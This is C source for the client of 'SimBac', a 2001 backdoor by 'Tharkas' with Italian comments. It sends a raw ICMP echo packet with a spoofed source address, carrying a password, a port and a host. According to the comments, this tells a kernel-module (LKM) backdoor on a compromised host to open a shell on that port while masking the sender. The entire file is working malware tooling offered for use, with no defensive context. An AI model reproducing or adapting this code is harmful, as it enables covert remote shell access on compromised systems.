/* File client.c from packet simbac.tar.gz */
/* By Tharkas / punkratio 2001             */ 

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>

u_short in_chksum(u_short *, int);
void usage(char *);
unsigned long int resolve(char *);

struct opt {
 /* Per verificare l'integrit del pacchetto.. Teoricamente  superfluo,
     ma in fondo son solo 2 byte =) */
 short valid;

 /* Questo  l'host da cui spediamo il pacchetto, necessario per
     mascherare nell'LKM */
 char host[65];

 /* La password settata sul server... */
 char pass[32];

 /* La porta dove vogliamo che venga castata la shell */
 int port;
};

main(int argc, char **argv) {
int s;
struct sockaddr_in addr;
struct iphdr *ip;
struct icmphdr *icmp;
char *pkt;
struct opt opt;
int port;

printf("\tSimBac client v0.0 Alpha Beta Gamma Delta by Tharkas\n");
printf("\tDedicated to.. Eleonora.\n");

  if (argc < 4)
    usage(argv[0]);

  if (getuid() || getgid()) {
    printf("You must be root..\n");
    exit(-1);
  }

s = socket(AF_INET,SOCK_RAW,IPPROTO_RAW);

 if (s == -1) {
   perror("socket");
   exit(-1);
 }

 addr.sin_family = AF_INET;
 addr.sin_addr.s_addr = resolve(argv[1]);

 port = atoi(argv[2]);

 if ((port < 1) || (port > 65535)) {
  printf("Porta non valida.\n");
  exit(-1);
 }

 /* Riempiamo la structura options... */

 opt.valid = 1;
 opt.port = port;
 strncpy(opt.host,argv[3],64);
 strncpy(opt.pass,getpass("Password:"),31);

 /* 28 = sizeof(struct iphdr) + sizeof(struct icmphdr) */

 pkt = (char *) malloc(28 + sizeof(opt));
 memset(pkt,0,28 + sizeof(opt));


 ip = (struct iphdr *) pkt;
 icmp = (struct icmphdr *) (pkt + 20);

  ip->ihl = 5;
  ip->version = 4;
  ip->tos = 0;
  ip->tot_len = 28 + sizeof(opt);

  /* HINT : perch non un bel generatore di id random ? =) */
  ip->id = 18347;
  ip->frag_off = 0;
  ip->ttl = 255;
  ip->protocol = IPPROTO_ICMP;
  ip->check = in_chksum((u_short *) ip, sizeof(struct ip));

  /* Vedi il campo 'id' */
  ip->saddr = inet_addr("1.2.3.4");
  ip->daddr = resolve(argv[1]);

  /* Se si cambia questo, bisogna adattare anche il server */
  icmp->type = ICMP_ECHO;
  icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmp));
  icmp->code = 0;

  /* Copio la struttura options nel pacchetto */
  memcpy(pkt+28, &opt, sizeof(opt));

  /* Pronti a far fuoco... */
  sendto(s, pkt, 28 + sizeof(opt), 0, (struct sockaddr_in *) &addr,
    sizeof(struct sockaddr_in));

  free(pkt);

  /* Well done. */

  exit(1);

}

/* Classica funzione di checksum */

u_short in_chksum(u_short *ptr, int nbytes)
{
  register long           sum;            /* assumes long == 32 bits */
  u_short                 oddbyte;
  register u_short        answer;         /* assumes u_short == 16 bits */
  sum = 0;
  while (nbytes > 1)
  {
    sum += *ptr++;
    nbytes -= 2;
  }
  if (nbytes == 1)
  {
     oddbyte = 0;            /* make sure top half is zero */
     *((u_char *) &oddbyte) = *(u_char *)ptr;   /* one byte only */
     sum += oddbyte;
  }
  sum  = (sum >> 16) + (sum & 0xffff);    /* add high-16 to low-16 */
  sum += (sum >> 16);                     /* add carry */
  answer = ~sum;          /* ones-complement, then truncate to 16 bits */

  return((u_short) answer);
}

void usage(char *name) {

  printf("Usage:\n\t%s <host> <port> <myhost>\n",name);

  exit(0);

}

/* Ancora pi classica funzione di solve */

unsigned long int resolve(char *host) {
struct in_addr addr;
struct hostent *h;

  h = gethostbyname(host);

   if (h == NULL) {
    perror("gethostbyname");
    exit(-1);
   }

  memcpy(&addr, h->h_addr, h->h_length);

  return addr.s_addr;
}
